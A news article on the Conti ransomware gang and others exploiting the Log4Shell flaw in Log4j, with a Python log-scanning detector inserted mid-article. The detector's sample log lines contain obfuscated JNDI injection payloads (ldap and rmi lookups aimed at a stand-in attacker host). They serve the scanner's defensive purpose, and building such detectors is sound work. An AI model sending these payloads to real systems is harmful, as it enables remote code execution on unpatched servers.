Log4j flaw gets a lot of attention from ‘ruthless’ ransomware gang



The prominent ransomware gang Conti has expanded its efforts to exploit the Apache Log4j vulnerability, apparently seeing the widespread flaw as the basis for a new wave of attacks, according to security researchers.

Researchers from cybersecurity firms Qualys and AdvIntel told VentureBeat that they have observed activities by Conti to exploit the critical vulnerability in Log4j logging software, known as Log4Shell, in recent days.

Qualys has observed “attempted ransomware attacks, some of which have been successful, by Conti, Khonsari, and some nation-state-backed adversaries,” Travis Smith, director of malware threat research at Qualys, said in an email to VentureBeat. Details of the attacks were not disclosed.

Meanwhile, AdvIntel shared findings with VentureBeat stating that Conti has assembled an entire attack chain around the Log4Shell vulnerability and launched initial attack attempts. Late last week, AdvIntel became the first cybersecurity firm to report spotting Conti in action around the Log4j vulnerability.

So far, there has been no public disclosure of a successful ransomware breach stemming from the Log4j vulnerability. But the widespread and trivially exploitable flaw in Log4j “is a dream come true for ransomware groups,” Eyal Dotan, Cameyo founder and chief technology officer, said in an email.

Complete chain of attack

Khonsari was the first ransomware family publicly disclosed by researchers to be exploiting Log4Shell; the Conti and TellYouThePass ransomware families have now joined it, according to the researchers.

In its December 17 report, AdvIntel said that Conti has been observed to be exploiting the vulnerability in Log4j to gain access and move laterally on vulnerable VMware vCenter servers.

Since publishing that report, AdvIntel has observed additional activities from Conti around Log4Shell, the company told VentureBeat. In addition to identifying Conti’s complete chain of attack, “we have seen and observed the direct use [by Conti] in different cases targeting VMware vCenter,” said AdvIntel CEO Vitali Kremez in an email.

Conti’s chain of attack includes the deployment of the Emotet botnet and the use of Cobalt Strike for reconnaissance, privilege escalation, payload delivery and data theft, Yelisey Boguslavskiy, AdvIntel’s head of research, said in an email to VentureBeat.

“For Conti, this is a huge leap in their offensive operations as they can now experiment and diversify their arsenal,” Boguslavskiy said. “This means that if a certain attack vector, such as VPN accesses, becomes less profitable, they can always compensate by investing more in Log4j. In addition, it gives them another advantage in competition with smaller groups that cannot afford the proper research to exploit these vulnerabilities efficiently.”

AdvIntel’s investigation into Conti’s activities relied on primary-source intelligence, including victim breach intelligence and post-incident response, the company said.

In a statement in response to the AdvIntel report, VMware said that “the security of our customers is our highest priority” and noted that it has issued a security advisory which it is updating periodically. “Any service connected to the Internet and not yet patched for the Log4j vulnerability (CVE-2021-44228) is vulnerable to hackers, and VMware strongly recommends immediate patching for Log4j,” the company said in the statement.

‘Ruthless’ organization

Conti is believed to be a Russian ransomware group that was previously called Wizard Spider. In a June report, Richard Hickman of Palo Alto Networks’ Unit 42 research group said that Conti “stands out as one of the most ruthless of the dozens of ransomware gangs we follow.”

“The group has spent more than a year targeting organizations where IT outages can have life-threatening consequences: hospitals, 911 carriers, emergency medical services and law enforcement agencies,” Hickman wrote in the report.

For example, a May 2021 attack in Ireland “shut down the entire information technology network of the nation’s healthcare system, leading to cancellation of appointments, shutdown of X-ray systems and delays in COVID testing,” he wrote.

According to the June report, the FBI had identified more than 400 cyberattacks related to Conti, with three-quarters of the attacks against US-based organizations. Ransom demands have reached more than $25 million, which also ranks Conti among the “most greedy ransomware groups,” Hickman wrote.

Sophisticated attacks

Conti plays an important role in today’s threat landscape because of its scale, Smith said.

“Conti is always behind ransomware and is incredibly strategic and tactical with its approach,” he said. “They don’t just send a lot of phishing emails, they look to entrench themselves in environments, and move as quietly as possible until they find the crown jewels.”

Because Log4Shell allows remote code execution by unauthenticated users, “it will make sophisticated actors like Conti very successful,” Smith said. “It will allow groups to reconnoiter, move laterally, and ultimately deploy ransomware.”

Conti faces less of a challenge in how to exploit Log4j and more of a challenge in competing with other threat actors for the available attack opportunities, Dotan said. “The fastest ransomware groups capable of reaching the most vulnerable servers would be winning this race,” he said.

And while the major ransomware attacks stemming from Log4j have yet to come to light, that doesn’t mean ransomware groups aren’t busy preparing.

“If you’re an affiliate or a ransomware operator right now, all of a sudden you have access to all these new systems,” said Sean Gallagher, senior threat researcher at SophosLabs. “You have more work on your hands than you know what to do with at this moment.”

Necessary preparations

Still, while the Log4j vulnerability itself is considered very easy to exploit, a great deal of groundwork is required to use it to deploy ransomware. Post-exploitation discovery work must be done before a major ransomware attack can be launched, said Ed Murphy, product manager at Huntress.

“It is not a vulnerability that persists on your laptop and mine. So it’s not something that can just reach out and unleash a massive ‘spray and pray’ ransomware attack,” Murphy said in an interview.

Log4j affects servers, and most ransomware operators won’t want to ransom just a single server, which probably has backups, he noted.

“Where they really get a big chunk of their income is by being able to affect an entire organization,” Murphy said. “That’s the kind of chaos where people are most willing to pay those ransom demands.”

So after attackers land on a server on a corporate network, they will first have to figure out what other devices they can “talk” to from that server, he said. Then they’ll have to figure out what applications are running on those devices and how to get from the server to the laptops that are connected to it, Murphy said.

This means that it could be some time before major ransomware attacks actually emerge from the disclosure of Log4Shell. “There is activity that needs to happen after they’ve exploited the Log4j vulnerability to really gain more control over the network they landed on,” Murphy said.

Widespread vulnerability

Many business applications and cloud services written in Java are potentially vulnerable due to flaws in Log4j prior to version 2.17, which was released last Friday. The open source logging library is believed to be used in some way, either directly or indirectly through a Java framework, by most large organizations.

Log4j version 2.17 is the third patch for vulnerabilities in the software since the initial disclosure of a remote code execution (RCE) vulnerability on December 9. Security firm Check Point reported on Monday that it had seen attempts to exploit vulnerabilities in Log4j in more than 48% of corporate networks worldwide.
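The exploitation attempts Check Point and VMware describe arrive as `${jndi:...}` lookup strings placed in any field the target application logs (User-Agent, request path, headers). Attackers routinely hide the literal `jndi` behind nested lookups such as `${${lower:j}ndi:...}` or `${${::-j}ndi:...}` and URL-encode the whole thing, so a naive substring grep misses most real traffic. The following detector is an added example, not code from the article or from any vendor quoted in it: it undoes URL encoding and the common `lower`/`upper`/default-value obfuscations before looking for a JNDI lookup, then reports the scheme (ldap, rmi, dns) used. The access-log lines it scans are constructed for the example, using RFC 5737 documentation addresses.

```python
"""Detect Log4Shell (CVE-2021-44228) exploitation attempts in web access logs.

Added example, not code from the article or from any vendor quoted in it.
The SAMPLE_LOGS below are constructed; the IP addresses are from RFC 5737
documentation ranges and do not belong to any real host.
"""
import re
from urllib.parse import unquote

# Innermost ${...} lookups only: the body contains no further '${' or '}'.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# After normalization, any remaining ${jndi:<scheme>: is an attempt.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)", re.IGNORECASE)

# Constructed Apache combined-format lines: three attempts, two benign requests.
SAMPLE_LOGS = [
    '203.0.113.5 - - [10/Dec/2021:03:12:44 +0000] "GET / HTTP/1.1" 200 512 '
    '"-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.5 - - [10/Dec/2021:03:13:01 +0000] "GET /?x=%24%7B%24%7Blower'
    '%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.7%3A1389%2Fb%7D HTTP/1.1" 200 512 '
    '"-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Dec/2021:03:14:10 +0000] "GET /login HTTP/1.1" 200 512 '
    '"-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.7:1099/c}"',
    '198.51.100.22 - - [10/Dec/2021:03:15:00 +0000] "GET /about HTTP/1.1" 200 '
    '2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.23 - - [10/Dec/2021:03:16:00 +0000] "GET /docs/jndi-tutorial '
    'HTTP/1.1" 200 2048 "-" "curl/7.68.0"',
]


def _resolve_inner(match: re.Match) -> str:
    """Evaluate the lookups attackers use to hide the literal string 'jndi'."""
    body = match.group(1)
    prefix, _, arg = body.partition(":")
    kind = prefix.strip().lower()
    if kind == "jndi":
        return match.group(0)            # keep the lookup we are hunting for
    if kind == "lower":
        return arg.lower()               # ${lower:J} -> j
    if kind == "upper":
        return arg.upper()               # ${upper:j} -> J
    if ":-" in body:
        return body.split(":-", 1)[1]    # ${::-j}, ${env:NaN:-j} -> j (default)
    return match.group(0)                # unknown lookup: leave untouched


def normalize(text: str, max_rounds: int = 10) -> str:
    """Undo (possibly double) URL encoding and nested lookup obfuscation."""
    for _ in range(2):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    # Resolve innermost lookups first, repeating until nothing changes.
    for _ in range(max_rounds):
        resolved = _INNER.sub(_resolve_inner, text)
        if resolved == text:
            break
        text = resolved
    return text


def scan(lines):
    """Return one hit per log line that still carries a JNDI lookup after normalization."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        normalized = normalize(line)
        found = _JNDI.search(normalized)
        if found:
            hits.append({"line": lineno, "scheme": found.group(1).lower(),
                         "normalized": normalized})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(f"line {hit['line']}: jndi scheme={hit['scheme']}")
```

Run against the constructed lines, the scanner flags lines 1 to 3 (two `ldap` attempts and one `rmi` attempt) and leaves the benign `/about` and `/docs/jndi-tutorial` requests alone, because it keys on the `${jndi:` lookup syntax rather than on the word itself. Line 2 only becomes visible after URL decoding and resolving the `${lower:j}` wrapper; line 3 only after the `${::-x}` default-value lookups collapse. Finding these strings in a log proves an attempt, not a compromise: the request is only dangerous if a vulnerable Log4j version logged the field and could reach the attacker's LDAP or RMI listener, so hits should be correlated with outbound connections from the logging host.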

The ransomware problem had already gotten a lot worse this year. During the first three quarters of 2021, SonicWall reported that ransomware attack attempts increased 148% year over year. CrowdStrike reports that the average ransomware payment increased by 63% in 2021, reaching $1.79 million.

Attempts to attack targets in the US and Europe using ransomware from the TellYouThePass family have been observed, Sophos researchers told VentureBeat on Tuesday.

However, ransomware is just one of the many serious threats posed by the Log4j vulnerability. There is a greater, but less visible, danger related to Log4Shell, according to Dotan: the existence of “sophisticated hacker groups and state-backed hackers who do not intend to take advantage of this opportunity at this time,” he said.

Instead, those threat actors “would rather install a backdoor and secretly take control of the infected servers for the next several months, without their owners knowing,” Dotan said.
